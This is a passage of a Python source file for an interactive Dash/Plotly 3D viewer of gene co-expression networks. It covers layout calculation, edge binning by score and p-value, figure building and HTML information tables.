calculated. The file will be saved with this name\n and the extension \".2Dlayout.txt\"\n\n redo_layout : A boolean indicting if the layout should be rebuilt rather\n than loading from file if one exists already.\n\n return : a Pandas dataframe containing the layout coordinates for\n the nodes in the network. 
The dataframe contains X, and Y\n dimenstional coordinates.\n \"\"\"\n\n g = get_iGraph(net)\n g.simplify()\n t = pd.Series(g.transitivity_local_undirected(), index=g.vs['name'])\n d = pd.DataFrame(g.degree(), index=g.vs['name'], columns=['Degree'])\n\n forceatlas2 = ForceAtlas2(\n # Behavior alternatives\n outboundAttractionDistribution=True, # Dissuade hubs\n linLogMode=False, # NOT IMPLEMENTED\n adjustSizes=False, # Prevent overlap (NOT IMPLEMENTED)\n edgeWeightInfluence=1.0,\n\n # Performance\n jitterTolerance=1.0, # Tolerance\n barnesHutOptimize=True,\n barnesHutTheta=1.2,\n multiThreaded=False, # NOT IMPLEMENTED\n\n # Tuning\n scalingRatio=2.0,\n strongGravityMode=False,\n gravity=1,\n\n # Log\n verbose=True)\n\n if (redo_layout | (not os.path.exists(net_prefix + '.2Dlayout.txt'))):\n print(\"Calculating 2D layout.\")\n glayout = pd.DataFrame(forceatlas2.forceatlas2_igraph_layout(g, iterations=iterations).coords)\n glayout.columns = ['X', 'Y']\n glayout.index = g.vs['name']\n glayout = pd.concat([glayout, d, t], axis=1, sort=False)\n glayout.columns = ['X', 'Y', 'Degree', 'CC']\n glayout.to_csv(net_prefix + '.2Dlayout.txt')\n else:\n glayout = pd.read_csv(net_prefix + '.2Dlayout.txt', index_col=0)\n\n return glayout\n\n\n\n\n\ndef bin_edges(net):\n \"\"\"\n Calculates a set of bins using the Similarity score and P-value.\n\n It is from these bins that the edges and nodes of the network will be\n stacked in the z-axis of the 3D plot and or colored. Four new\n columns are added to the provided network: 'Edge_Bin', 'Pval_Bin',\n 'Rsqr_Bin' and 'Relationship'.\n\n net : The network dataframe created by the load_network function.\n\n \"\"\"\n net['Edge_Bin'] = np.around(np.abs(net['Similarity_Score']), decimals=2)\n net['Pval_Bin'] = np.round(-np.log10(net['p_value']))\n if 'hotelling_p_value' in net.columns:\n net['HPval_Bin'] = np.round(-np.log10(net['hotelling_p_value']))\n if (net['r_squared'].dtype == 'object'):\n net['Rsqr_Bin'] = 0\n else:\n net['Rsqr_Bin'] = np.around(net['r_squared'], decimals=1)\n net['Relationship'] = np.ceil(net['Similarity_Score']).astype('str')\n net['Relationship'] = net['Relationship'].replace(\"-0.0\", 'Negative')\n net['Relationship'] = net['Relationship'].replace(\"1.0\", 'Positive')\n\n\n\n\n\ndef get_vertex_zlayers(net, glayout, net_prefix, redo_layout):\n \"\"\"\n Uses the 2D layout and calculates the Z-coordinate for the nodes.\n\n net : The network dataframe created by the load_network function.\n\n glayout : The dataframe containing the 2D layout of the nodes.\n\n net_prefix: The filename of the file that will house the vertex layout\n after it is calculated. 
The file will be saved with this name\n and the extension \".3Dvlayers.txt\"\n\n redo_layout : A boolean indicting if the layout should be rebuilt rather\n than loading from file if one exists already.\n\n return : A Pandas dataframe containing the X, Y and Z coordinates for the\n nodes as well as the Degree and CC (clustering coefficient) for\n each node.\n \"\"\"\n\n def find_vlayers(row, vtype='Source', bar=None):\n if bar:\n bar.next()\n node = glayout.loc[row[vtype]]\n ebin = row['Edge_Bin']\n pbin = row['Pval_Bin']\n hpbin = np.nan\n if ('HPval_Bin' in row.index):\n hpbin = row['HPval_Bin']\n rbin = row['Rsqr_Bin']\n rel = row['Relationship']\n test = row['Test_Name']\n return(row[vtype], node['X'], node['Y'], ebin, pbin, hpbin, rbin, rel, test, node['Degree'], node['CC'])\n\n\n if (redo_layout | (not os.path.exists(net_prefix + '.3Dvlayers.txt'))):\n print(\"Calculating 3D vertex layout.\")\n bar = IncrementalBar('', max=net.shape[0]*2, suffix='%(percent)d%%')\n lsource = net.apply(find_vlayers, vtype='Source', bar=bar, axis=1)\n ltarget = net.apply(find_vlayers, vtype='Target', bar=bar, axis=1)\n print(\"\")\n\n columns = ['Vertex', 'X', 'Y', 'EBin', 'PBin', 'HPBin', 'RBin', 'Rel', 'Test_Name', 'Degree', 'CC']\n vlayers = pd.DataFrame.from_records(lsource.append(ltarget).values, columns=columns)\n vlayers = vlayers[vlayers.duplicated() == False]\n # We want to place the node in the layer where it first appears.\n vlayers = vlayers.groupby(by=['Vertex']).apply(lambda g: g[g['EBin'] == g['EBin'].max()])\n vlayers.reset_index(inplace=True, drop=True)\n vlayers.to_csv(net_prefix + '.3Dvlayers.txt')\n\n else:\n vlayers = pd.read_csv(net_prefix + '.3Dvlayers.txt', index_col=0)\n\n return vlayers\n\n\n\n\n\ndef get_edge_zlayers(net, glayout, net_prefix, redo_layout):\n \"\"\"\n Uses the 2D layout and calculates the Z-coordinate for the edges.\n\n Edges are drawn as lines in the 3D scatterplot, therefore this function\n calculates the start and stop coordinates for the edges in the format\n required by the scatter3d viewer.\n\n net : The network dataframe created by the load_network function.\n\n glayout : The dataframe containing the 2D layout of the nodes.\n\n net_prefix: The filename of the file that will house the vertex layout\n after it is calculated. The file will be saved with this name\n and the extension \".3Delayers.txt\"\n\n redo_layout : A boolean indicting if the layout should be rebuilt rather\n than loading from file if one exists already.\n\n return : A Pandas dataframe containing the X, Y and Z coordinates arrays\n for the edges as well as Source, Target and Samples values from\n the original network. 
The X, Y and Z coordiantes are tuples.\n \"\"\"\n\n def place_elayers(row, bar = None):\n if bar:\n bar.next()\n ebin = row['Edge_Bin']\n pbin = row['Pval_Bin']\n hpbin = np.nan\n if ('HPval_Bin' in row.index):\n hpbin = row['HPval_Bin']\n rbin = row['Rsqr_Bin']\n rel = row['Relationship']\n test = row['Test_Name']\n source = glayout.loc[row[\"Source\"]]\n target = glayout.loc[row[\"Target\"]]\n return([[source['X'], target['X'], None],\n [source['Y'], target['Y'], None],\n row[\"Source\"],\n row[\"Target\"],\n row[\"Samples\"],\n ebin, pbin, hpbin, rbin, rel, test])\n\n if (redo_layout | (not os.path.exists(net_prefix + '.3Delayers.txt'))):\n print(\"Calculating 3D edge layout.\")\n bar = IncrementalBar('', max=net.shape[0], suffix='%(percent)d%%')\n ledge = net.apply(place_elayers, bar=bar, axis=1)\n print(\"\")\n\n elayers = pd.DataFrame.from_records(ledge, columns=['X', 'Y', 'Source', 'Target', 'Samples', 'EBin', 'PBin', 'HPBin', 'RBin', 'Rel', 'Test_Name'])\n elayers['name'] = elayers['Source'] + \" (co) \" + elayers['Target']\n elayers.to_csv(net_prefix + '.3Delayers.txt')\n else:\n elayers = pd.read_csv(net_prefix + '.3Delayers.txt', index_col=0)\n elayers['X'] = elayers['X'].apply(ast.literal_eval)\n elayers['Y'] = elayers['Y'].apply(ast.literal_eval)\n\n return elayers\n\n\n\n\n\ndef create_network_plot(net, vlayers, elayers, color_by = 'Score', layer_by = 'Score',\n camera = None, aspect = None):\n \"\"\"\n Uses Plotly to create the interactive 3D visualization of the network.\n\n This function uses the Scatter3D plot to draw the network. The axes are\n hidden so it appears as a typical network view. It defaults to\n a straight on view as the network would be seen in a typical 2D viewer like\n Cytoscape.\n\n net : The network dataframe created by the load_network function.\n\n vlayers : The dataframe containing the 3D coordinates for the nodes.\n\n elayers : The dataframe containing the 3D coordinates for the edges.\n\n camera : A dictionary containing the figure camera coordinates.\n\n return : a Plotly figure object.\n \"\"\"\n\n # Default Z-indexs for lines/points to the Score value.\n Z = vlayers['EBin']\n if layer_by == 'Score':\n Z = vlayers['EBin']\n if layer_by == 'P-value':\n Z = vlayers['PBin']\n if layer_by == 'Hotelling P-value (phased)':\n Z = vlayers['HPBin']\n if layer_by == 'R^2':\n Z = vlayers['RBin']\n if layer_by == 'Test Name':\n Z = vlayers['Test_Name']\n if layer_by == 'Relationship':\n Z = vlayers['Rel']\n # Add the network nodes as the first trace.\n fig1 = go.Figure(data=[go.Scatter3d(x=vlayers['X'], y=vlayers['Y'],\n z=Z, mode='markers',\n opacity = 0.5,\n marker=dict(symbol='circle', size=np.log10(vlayers['Degree'])*4,\n line=dict(width=1, color=\"#888888\")),\n text=\"Node: \" + vlayers['Vertex'],\n customdata=vlayers['Vertex'],\n hoverinfo='text', name='Nodes')])\n\n # Add the edges and bin them\n include_slider = True\n if color_by == 'Score':\n slider_title = 'Similarity Score'\n if color_by == 'P-value':\n slider_title = '-log10(p)'\n if color_by == 'Hotelling P-value (phased)':\n slider_title = '-log10(p)'\n if color_by == 'R^2':\n slider_title = 'R-squared'\n if color_by == 'Test Name':\n slider_title = 'Test Name'\n include_slider = False\n if color_by == 'Relationship':\n slider_title = 'Relationship Type'\n include_slider = False\n\n layer_title = layer_by\n if layer_by == 'P-value':\n layer_title = '-log10(p)'\n if layer_by == 'Hotelling P-value (phased)':\n layer_title = '-log10(p)'\n\n (colorway, sliders, nticks) = 
create_binned_network_figure(fig1, elayers, color_by,\n layer_by, slider_title, include_slider)\n\n fig1.update_layout(\n autosize=True,\n #title=dict(text = \"3D Network View\", font = dict(color='#FFFFFF')),\n showlegend=True,\n legend=dict(font = dict(color=\"#FFFFFF\")),\n margin=dict(l=450, r=10, t=10, b=10),\n paper_bgcolor=\"#000000\",\n colorway=colorway,\n scene=dict(\n aspectmode=\"cube\",\n xaxis=dict(showbackground=False, showline=False, zeroline=False, showgrid=False,\n showticklabels=False, title='', showspikes=False),\n yaxis=dict(showbackground=False, showline=False, zeroline=False, showgrid=False,\n showticklabels=False, title='', showspikes=False),\n zaxis=dict(showbackground=False, showline=False, zeroline=False, showgrid=False,\n showticklabels=True, tickmode=\"auto\", nticks=nticks, title=layer_title, showspikes=False, color=\"#FFFFFF\")\n ),\n hovermode='closest',\n annotations=[dict(showarrow=False, text=\"\", xref='paper', yref='paper',\n x=0, y=0.1, xanchor='left', yanchor='bottom', font=dict(size=14))\n ],\n sliders=sliders,\n )\n\n # We want an orthographic layout so that when looking above the edges line up\n # with the nodes.\n fig1.layout.scene.camera.projection.type = \"orthographic\"\n fig1.layout.scene.camera.eye = dict(x=0, y=0, z=2)\n if camera:\n fig1.layout.scene.camera.eye = camera['eye']\n\n fig1.layout.scene.aspectmode = 'manual'\n if aspect:\n fig1.layout.scene.aspectratio = aspect\n\n return fig1\n\n\n\n\n\ndef create_binned_network_figure(figure, elayers, color_by = 'Score',\n layer_by = 'Score', slider_title = 'Similarity Score', include_slider = True):\n\n \"\"\"\n Adds the traces for the network figure based on the bin column.\n\n \"\"\"\n\n color_col = 'EBin'\n if color_col == 'Score':\n color_col = 'EBin'\n if color_by == 'P-value':\n color_col = 'PBin'\n if color_by == 'Hotelling P-value (phased)':\n color_col = 'HPBin'\n if color_by == 'R^2':\n color_col = 'RBin'\n if color_by == 'Test Name':\n color_col = 'Test_Name'\n if color_by == 'Relationship':\n color_col = 'Rel'\n\n layer_col = 'EBin'\n if layer_by == 'Score':\n layer_col = 'EBin'\n if layer_by == 'P-value':\n layer_col = 'PBin'\n if layer_by == 'Hotelling P-value (phased)':\n layer_col = 'HPBin'\n if layer_by == 'R^2':\n layer_col = 'RBin'\n if layer_by == 'Test Name':\n layer_col = 'Test_Name'\n if layer_by == 'Relationship':\n layer_col = 'Rel'\n\n # Add edge traces to the figure, one each per bin.\n layer_bins = np.flip(np.sort(elayers[layer_col].unique()))\n color_bins = np.flip(np.sort(elayers[color_col].unique()))\n for bin in color_bins:\n if (not type(bin) == str):\n if (bin.dtype == \"float64\") & (np.isnan(bin)):\n continue\n\n bin_edges = elayers[elayers[color_col] == bin]\n\n # Reformat the elayers for use by the Scatter3d function.\n eX = np.hstack(bin_edges['X'])\n eY = np.hstack(bin_edges['Y'])\n eZ = np.hstack(bin_edges[layer_col].repeat(3))\n names = bin_edges['name'][bin_edges.index.repeat(3)]\n\n # Create the scatterplot containing the lines for edges.\n figure.add_trace(go.Scatter3d(x=eX, y=eY, z=eZ,\n mode='lines',\n line=dict(width=1),\n text=\"Edge: \" + names,\n hoverinfo='text', name=bin,\n customdata=bin_edges.index.repeat(3)))\n\n # Add a slider for the network viewer\n if include_slider:\n steps = []\n steps.append(dict(\n method=\"restyle\",\n args=[\"visible\", [True] * (len(color_bins) + 2)],\n label='all'\n ))\n steps.append(dict(\n method=\"restyle\",\n args=[\"visible\", [False] * (len(color_bins) + 2)],\n label='nodes'\n ))\n 
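# The 'nodes' step above turned every trace off; switch trace 0 (the node markers) back on so nodes stay visible when that step is selected.\n        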
steps[1][\"args\"][1][0] = True\n for i in range(len(color_bins)):\n step = dict(\n method=\"restyle\",\n args=[\"visible\", [False] * (len(color_bins) + 2)],\n label=color_bins[i]\n )\n # Turn on the layers for this step and leave on the nodes layer.\n step[\"args\"][1][0] = True\n for j in range(1,i+2):\n step[\"args\"][1][j] = True\n\n # Set the label.\n steps.append(step)\n\n\n colorway = [\"#FFFFFF\"] + sns.color_palette('viridis_r', color_bins.size).as_hex()\n\n sliders = [dict(\n active=0,\n currentvalue={\"prefix\": slider_title + \": \"},\n pad={\"b\": 50},\n steps=steps,\n font=dict(color = '#FFFFFF'),\n tickcolor='#FFFFFF',\n len=1)]\n else:\n colorway = [\"#FFFFFF\"] + sns.color_palette('muted', color_bins.size).as_hex()\n sliders = []\n\n nticks = layer_bins.size\n if layer_by == 'Score':\n nticks = int(nticks / 2)\n return (colorway, sliders, nticks)\n\n\n\n\n\ndef create_degree_distribution_plot(vlayers):\n \"\"\"\n Creates a 2D scatterplot containing the degree distribution\n \"\"\"\n vdata = vlayers.loc[:,('Vertex', 'Degree')].drop_duplicates()\n vdata = vdata.groupby('Degree').agg(['count']).reset_index()\n\n fig = go.Figure(data=[go.Scatter(\n x=vdata['Degree'],\n y=vdata['Vertex']['count'],\n mode='markers',\n marker=dict(symbol='circle', size=5, color='#000088'))])\n fig.update_layout(\n height=350,\n title=\"Node Degree Distribution\",\n margin=dict(l=10, r=10, t=80, b=20),\n xaxis_type=\"log\",\n yaxis_type=\"log\",\n xaxis_title=\"Degree\",\n yaxis_title=\"Number of Nodes\",\n )\n return fig\n\n\n\n\n\ndef create_avg_cc_distribution_plot(vlayers):\n \"\"\"\n Creates a 2D scatterplot containing the average clustering coefficient distribution\n \"\"\"\n vdata = vlayers.loc[:,('CC', 'Degree')].drop_duplicates()\n vdata = vdata.groupby('Degree').agg(['mean']).reset_index()\n\n fig = go.Figure(data=[go.Scatter(\n x=vdata['Degree'],\n y=vdata['CC']['mean'],\n mode='markers',\n marker=dict(symbol='circle', size=5, color='#000088'))])\n fig.update_layout(\n height=350,\n title=\"Avg. 
Clustering Coefficient Distribution\",\n        margin=dict(l=10, r=10, t=80, b=10),\n        xaxis_type=\"log\",\n        yaxis_type=\"log\",\n        xaxis_title=\"Degree\",\n        yaxis_title=\"Avg. Clustering Coefficient\",\n    )\n    return fig\n\n\n\n\ndef create_expression_scatterplot(gem, amx, elayers, color_col=None, edge_index = None):\n    \"\"\"\n    Uses Plotly to create the interactive 3D scatterplot of co-expression\n\n    This function uses the Scatter3D plot to draw the co-expression scatterplot.\n    It defaults to a straight on view but can be interactively rotated,\n    panned, etc.\n\n    gem : The GEM dataframe created by the load_gem function.\n\n    amx : The annotation matrix dataframe created by the load_amx function.\n\n    elayers : The dataframe containing the 3D coordinates for the edges.\n\n    color_col : The name of the column in the amx that contains the category\n                that should be used for coloring the points in the plot.\n\n    edge_index : The numerical index of the edge in the elayers dataframe\n                 that is to be plotted.\n\n    return : a Plotly figure object.\n    \"\"\"\n    if edge_index is None:\n        return go.Figure(go.Scatter3d())\n\n    node1 = elayers.iloc[edge_index]['Source']\n    node2 = elayers.iloc[edge_index]['Target']\n    samples = elayers.iloc[edge_index]['Samples']\n\n\n    # Generate the dataframe for the expression scatterplot\n    sdata = pd.DataFrame(dict(X=gem.loc[node1].values, Y=gem.loc[node2].values))\n    sdata.index = gem.columns\n    sdata = sdata.join(amx, how='left')\n\n    # Calculate the sizes of the points.\n    sizes = pd.Series(list(samples))\n    sizes = sizes.replace(to_replace=r'[^1]', value='5', regex=True)\n    sizes = sizes.replace({'1': '10'})\n    sizes = sizes.astype('int')\n    sizes.index = sdata.index\n\n    # Generate the colors for the samples.\n    if (color_col is None):\n        color_col = 'Cluster'\n\n    # If the column is 'Cluster' we need to add it to the dataframe. 
The\n # Cluster column simply lists if the sample is in the cluster or not.\n if (color_col == 'Cluster'):\n inout = pd.Series(list(samples))\n inout = inout.replace(to_replace=r'[^1]', value='Out', regex=True)\n inout = inout.replace({'1': 'In'})\n inout.index = gem.columns\n sdata = pd.concat([sdata, inout.rename('Cluster')], 1)\n\n # Is this a categorical column?\n is_categorical = False\n categories = sdata[color_col].unique()\n if (categories.dtype == object):\n is_categorical = True\n\n # Now draw the plot\n nticks = None\n tickmode = 'auto'\n ticktext = None\n tickvals = None\n if is_categorical:\n num_categories = categories.shape[0]\n tickmode = 'array'\n ticktext = categories\n tickvals = np.arange(0, num_categories) / (num_categories - 1) - 0.5\n replace_df = pd.DataFrame({'Categories' : categories,'Z' : tickvals})\n sdata['Z'] = sdata[color_col].replace(\n to_replace=replace_df['Categories'].values,\n value=replace_df['Z'].values)\n\n nticks = num_categories\n showlegend = True\n first_category = (sdata[color_col] == categories[0])\n fig2 = go.Figure(data=[go.Scatter3d(x=sdata[first_category]['X'],\n z=sdata[first_category]['Y'],y=sdata[first_category]['Z'],\n mode='markers',\n marker=dict(symbol='circle', size=sizes[first_category]),\n text= sdata[first_category].index, hoverinfo='text',\n name=str(categories[0]))])\n\n for i in range(1, len(categories)):\n next_category = (sdata[color_col] == categories[i])\n fig2.add_trace(go.Scatter3d(x=sdata[next_category]['X'],\n z=sdata[next_category]['Y'], y=sdata[next_category]['Z'],\n mode='markers',\n marker=dict(symbol='circle',size=sizes[next_category]),\n text= sdata[next_category].index,\n hoverinfo='text', name=str(categories[i])))\n else:\n num_categories = None\n sdata['Z'] = sdata[color_col]\n tickvals = []\n showlegend = False\n fig2 = go.Figure(data=[go.Scatter3d(x=sdata['X'], z=sdata['Y'], y=sdata['Z'],\n mode='markers',\n marker=dict(symbol='circle', size=sizes,\n color=sdata['Z'], colorscale='Viridis'),\n text= sdata.index, hoverinfo='text')])\n\n fig2.update_layout(\n height=400,\n title=\"\",\n showlegend=showlegend,\n legend={'itemsizing': 'constant'},\n margin=dict(l=10, r=10, t=0, b=10),\n scene=dict(\n aspectmode=\"cube\",\n xaxis=dict(showbackground=True, showline=True, zeroline=True, showgrid=True,\n showticklabels=True, title=node1,\n showspikes=True),\n zaxis=dict(showbackground=True, showline=True, zeroline=True, showgrid=True,\n showticklabels=True, title=node2,\n showspikes=True),\n yaxis=dict(showbackground=True, showline=True, zeroline=True, showgrid=True,\n showticklabels=True, title=color_col,\n tickmode=tickmode, ticktext=ticktext, tickvals=tickvals, nticks=nticks, showspikes=True),\n ),\n hovermode='closest',\n annotations=[dict(showarrow=False,\n text=\"\",\n xref='paper', yref='paper',\n x=0, y=0.1, xanchor='left', yanchor='bottom', font=dict(size=14))\n ],\n datarevision = time.time()\n )\n\n fig2.layout.scene.camera.projection.type = \"orthographic\"\n fig2.layout.scene.camera.eye = dict(x=0, y=-1, z=0)\n\n return fig2\n\n\n\n\n\ndef create_network_stats_table(net):\n \"\"\"\n Construts the HTML table that holds information about the network.\n\n net : the network data frame.\n \"\"\"\n htr_style = {}\n htd_style = {\n 'text-align' : 'left', 'padding' : '5px',\n 'margin': '0px', 'padding' : '0 0 0 20',\n 'width' : '60%', \"border-bottom\": \"1px solid #BBBBBB\"}\n td_style = {\n 'text-align' : 'left', 'padding' : '5px',\n 'margin': '0px', 'padding' : '0 0 0 20', \"border-bottom\": \"1px solid 
#BBBBBB\"\n }\n\n div_children = []\n table_rows = []\n\n num_edges = net.shape[0]\n unique_edges = net.loc[:,('Source', 'Target')].drop_duplicates().shape[0]\n num_nodes = len(pd.concat([net['Source'], net['Target']]).unique())\n\n div_children.append(\n html.Table(\n style = {\n \"background-color\" : 'white', 'color' : 'black',\n 'margin-top' : '0px', 'width' : '100%',\n 'margin-bottom' : '0px'\n },\n children=[\n html.Tr([\n html.Th('Total Edges', style=htd_style),\n html.Td(num_edges, style=td_style)\n ]),\n html.Tr([\n html.Th('Unique Edges', style=htd_style),\n html.Td(unique_edges, style=td_style)\n ]),\n html.Tr([\n html.Th('Number of Nodes', style=htd_style),\n html.Td(num_nodes, style=td_style)\n ])\n ]\n )\n )\n\n return html.Div(\n id='network-stats-table',\n children = div_children,\n )\n\n\ndef create_dash_edge_table(net, edge_index = None):\n \"\"\"\n Constructs the HTML table that holds edge information for the Dash appself.\n\n elayers : The dataframe containing the 3D coordinates for the edges.\n\n edge_index : The numerical index of the edge in the elayers dataframe\n that is to be plotted.\n\n returns : a Dash html.Table object.\n \"\"\"\n\n htr_style = {}\n htd_style = {\n 'text-align' : 'left', 'padding' : '5px',\n 'margin': '0px', 'padding' : '0 0 0 20',\n 'width' : '30%', \"border-bottom\": \"1px solid #BBBBBB\"}\n td_style = {\n 'text-align' : 'left', 'padding' : '5px',\n 'margin': '0px', 'padding' : '0 0 0 20', \"border-bottom\": \"1px solid #BBBBBB\"\n }\n\n net_fixed = net.drop(['Samples', 'Edge_Bin', 'Pval_Bin', 'Rsqr_Bin', 'Relationship'], axis=1)\n if ('HPval_Bin' in net_fixed.columns):\n net_fixed = net_fixed.drop(['HPval_Bin'], axis=1)\n for colname in net_fixed.columns:\n if ('p_value' in colname):\n net_fixed[colname] = net_fixed[colname].apply(np.format_float_scientific, precision=4)\n\n columns = net_fixed.columns\n div_children = []\n if not edge_index == None:\n row_vals = net_fixed.iloc[edge_index]\n source = row_vals['Source']\n target = row_vals['Target']\n div_children.append(html.Label(\n '{source} (co) {target}'.format(source = source, target=target),\n style = {'padding' : '0px', 'margin' : '0px'}\n ))\n div_children.append(html.Br())\n row_vals = net_fixed[(net_fixed['Source'] == source) & (net_fixed['Target'] == target)]\n for index, row in row_vals.iterrows():\n table_rows = []\n for col in columns:\n if col == \"Source\" or col == \"Target\":\n continue\n\n table_rows.append(\n html.Tr([\n html.Th(col, style=htd_style),\n html.Td(row[col], style=td_style)\n ])\n )\n div_children.append(\n html.Label('Edge #{index}'.format(index = index)))\n div_children.append(\n html.Table(\n style = {\n \"background-color\" : 'white', 'color' : 'black',\n 'margin-top' : '10px', 'margin-bottom' : '0px',\n 'width' : '100%',\n },\n children=table_rows\n )\n )\n else:\n div_children.append(\n html.Div('To view edge details, click an edge in the network.')\n )\n\n return html.Div(\n id='edge-table',\n children = div_children,\n )\n\n\n\n\n\ndef create_dash_sample_table(net, amx, sample = None):\n \"\"\"\n Constructs the HTML table that holds sample information for the Dash appself.\n\n amx : The annotation matrix dataframe created by the load_amx function.\n\n sample : The name of the sample to display\n\n returns : a Dash html.Table object.\n \"\"\"\n\n htr_style = {}\n htd_style = {\n 'text-align' : 'left', 'padding' : '5px',\n 'margin': '0px', 'padding' : '0 0 0 20',\n 'width' : '30%', \"border-bottom\": \"1px solid #BBBBBB\"}\n td_style = {\n 'text-align' 
: 'left', 'padding' : '5px',\n 'margin': '0px', 'padding' : '0 0 0 20', \"border-bottom\": \"1px solid #BBBBBB\"\n }\n\n columns = amx.columns\n div_children = []\n if sample:\n div_children.append(html.H4(\n children = ['Sample: {sample}'.format(sample = sample)],\n style = {'padding' : '0px', 'margin' : '0px'}\n ))\n table_rows = []\n row = amx.loc[sample]\n for col in columns:\n table_rows.append(\n html.Tr([\n html.Th(col, style=htd_style),\n html.Td(row[col], style=td_style)\n ])\n )\n\n div_children.append(\n html.Table(\n style = {\n \"background-color\" : 'white', 'color' : 'black',\n 'margin-top' : '10px',\n 'margin-bottom' : '10px', 'width' : '100%',\n },\n children=table_rows\n )\n )\n else:\n div_children.append(\n html.Div('To view sample details, click an edge in the network, then in the edge scatterplot click a sample.')\n )\n\n return html.Div(\n id='sample-table',\n children = div_children\n )\n\n\n\n\n\ndef create_dash_node_table(net, nmeta, vlayers, node = None):\n \"\"\"\n Constructs the HTML table that holds node information for the Dash app.\n\n net : The network dataframe created by the load_network function.\n\n nmeta : The dataframe containing the node metadata.\n\n vlayers : The dataframe containing the 3D coordinates for the nodes.\n\n node : The name of the node to display\n\n returns : a Dash html.Table object.\n \"\"\"\n\n htr_style = {}\n htd_style = {\n 'text-align' : 'left', 'padding' : '5px',\n 'margin': '0px', 'padding' : '0 0 0 20',\n 'width' : '30%', \"border-bottom\": \"1px solid #BBBBBB\"}\n td_style = {\n 'text-align' : 'left', 'padding' : '5px',\n 'margin': '0px', 'padding' : '0 0 0 20', \"border-bottom\": \"1px solid #BBBBBB\"\n }\n\n div_children = []\n table_rows = []\n if not node is None:\n table_rows.append(\n html.Tr([\n html.Th('Name', style=htd_style),\n html.Td(node, style=td_style)\n ])\n )\n table_rows.append(\n html.Tr([\n html.Th('Degree', style=htd_style),\n html.Td(vlayers.loc[vlayers['Vertex'] == node, 'Degree'].unique(), style=td_style)\n ])\n )\n if not nmeta is None:\n columns = nmeta.columns\n if not nmeta is None:\n rows = nmeta.loc[node]\n for index, row in rows.iterrows():\n table_rows.append(\n html.Tr([\n html.Th(\n colSpan = 2,\n children=[\n html.Label(\n \"{term}\".format(term = row['Term']),\n style= {'font-weight' : 'bold'}\n ),\n html.Div(\n row['Definition'],\n style= {'font-weight' : 'normal'})\n ],\n style=htd_style,\n )\n ])\n )\n else:\n div_children.append(\n html.Div('There is no additional information about this node.')\n )\n else:\n div_children.append(\n html.Div('There are no node meta data provided. 
Use the --nmeta option to load node data when running this application.')\n            )\n        div_children.append(\n            html.Table(\n                style = {\n                    \"background-color\" : 'white', 'color' : 'black',\n                    'margin-top' : '0px',\n                    'margin-bottom' : '0px', 'width' : '100%',\n                },\n                children=table_rows\n            )\n        )\n    else:\n        div_children.append(\n            html.Div('To view node details, click a node in the network.')\n        )\n\n    return html.Div(\n        id='node-table',\n        children = div_children\n    )\n\n\n\n\n\n\ndef create_condition_select(amx, sample_col = 'Cluster'):\n    \"\"\"\n    Creates a Dash select dropdown for selecting the condition to view.\n\n    This dropdown is intended to change the 3D co-expression scatterplot.\n\n    amx : The annotation matrix dataframe created by the load_amx function.\n\n    color_col : The name of the column in the amx that contains the category\n                that should be used for coloring the points in the plot.\n\n    return : A Dash dcc.Dropdown object.\n\n    \"\"\"\n    columns = np.sort(amx.columns.values)\n\n    # Holds the list of columns to keep.\n    keep = []\n    keep.append('Cluster')\n\n    # Exclude any columns with just a single value or any columns with as\n    # many unique values as there are elements\n    for col in columns:\n        if len(amx[col].dropna().unique()) <= 1:\n            continue\n        if len(amx[col].dropna().unique()) == amx[col].size:\n            continue\n        keep.append(col)\n\n    # Build the select element.\n    select = dcc.Dropdown(\n        id = 'coexp-condition-select',\n        style = {'color' : 'black'},\n        options = [\n            {'label' : col, 'value' : col} for col in keep\n        ],\n        value = 'Cluster'\n    )\n    return select\n\n\n\n\n\ndef create_edge_color_select(net):\n    \"\"\"\n    Creates a Dash select dropdown for selecting the network attribute to view.\n\n    This dropdown is intended to change the 3D network layout view.\n\n    net : The network dataframe created by the load_network function.\n\n    return : A Dash dcc.Dropdown object.\n\n    \"\"\"\n\n    options = ['Score']\n    if 'p_value' in net.columns:\n        options.append('P-value')\n    if 'hotelling_p_value' in net.columns:\n        options.append('Hotelling P-value (phased)')\n    if 'Test_Name' in net.columns:\n        options.append('Test Name')\n    if 'r_squared' in net.columns:\n        options.append('R^2')\n    options.append('Relationship')\n\n    select = dcc.Dropdown(\n        id = 'edge-color-select',\n        style = {\n            'color' : 'black'\n        },\n        options = [\n            {'label' : col, 'value' : col} for col in options\n        ],\n        value = 'Score'\n    )\n    return select\n\n\n\n\n\n\ndef create_edge_layer_select(net):\n    \"\"\"\n    Creates a Dash select dropdown for selecting the network attribute to view.\n\n    This dropdown is intended to change the 3D network layout view.\n\n    net : The network dataframe created by the load_network function.\n\n    return : A Dash dcc.Dropdown object.\n\n    \"\"\"\n\n    options = ['Score']\n    if 'p_value' in net.columns:\n        options.append('P-value')\n    if 'hotelling_p_value' in net.columns:\n        options.append('Hotelling P-value (phased)')\n    if 'Test_Name' in net.columns:\n        options.append('Test Name')\n    if 'r_squared' in net.columns:\n        options.append('R^2')\n    options.append('Relationship')\n\n    select = dcc.Dropdown(\n        id = 'edge-layer-select',\n        style = {\n            'color' : 'black'\n        },\n        options = [\n            {'label' : col, 'value' : col} for col in options\n        ],\n        value = 'Score'\n    )\n    return select\n\n\n\n\n\ndef build_sidebar_box_header(title, id_prefix):\n\n    return html.Div(\n        style = {\n            'background-color' : '#555555', 'color' : 'white',\n            'margin': '0px', 'padding':'10px',\n            \"border-radius\": \"5px\"},\n        children = [\n            html.H3(\n                children = [title],\n                style = {\n                    'float' : 
'left',\n 'padding' : '0px', 'margin' : '0px 0px 0px 0'\n }\n ),\n html.Button(\n 'toggle',\n id=\"{prefix}-toggle\".format(prefix=id_prefix),\n n_clicks=0,\n # src=\"https://img.icons8.com/officexs/32/000000/open-view.png\",\n style={\n \"height\" : \"20px\", \"float\" : \"right\",\n 'padding' : '0px', 'margin' : '0px 0px 0px 0'\n }\n ),\n html.Div(style ={'clear' : 'both'})\n ]\n )\n\n\n\n\n\ndef write_to_data_uri(s):\n \"\"\"\n Writes to a uri.\n Use this function to embed javascript into the dash app.\n Adapted from the suggestion by user 'mccalluc' found here:\n https://community.plotly.com/t/problem-of-linking-local-javascript-file/6955/2\n \"\"\"\n uri = (\n ('data:;base64,').encode('utf8') +\n base64.urlsafe_b64encode(s.encode('utf8'))\n ).decode(\"utf-8\", \"strict\")\n return uri\n\n\n\n\n\ndef build_application(net, gem, amx, nmeta, vlayers, elayers, sample_col,\n net_name):\n\n \"\"\"\n Creates the Dash application.\n\n The Dash application will provide all of the interactive plots, tables and\n filters to interacitvely exploring the network.\n\n net : The network dataframe created by the load_network function.\n\n gem : The GEM dataframe created by the load_gem 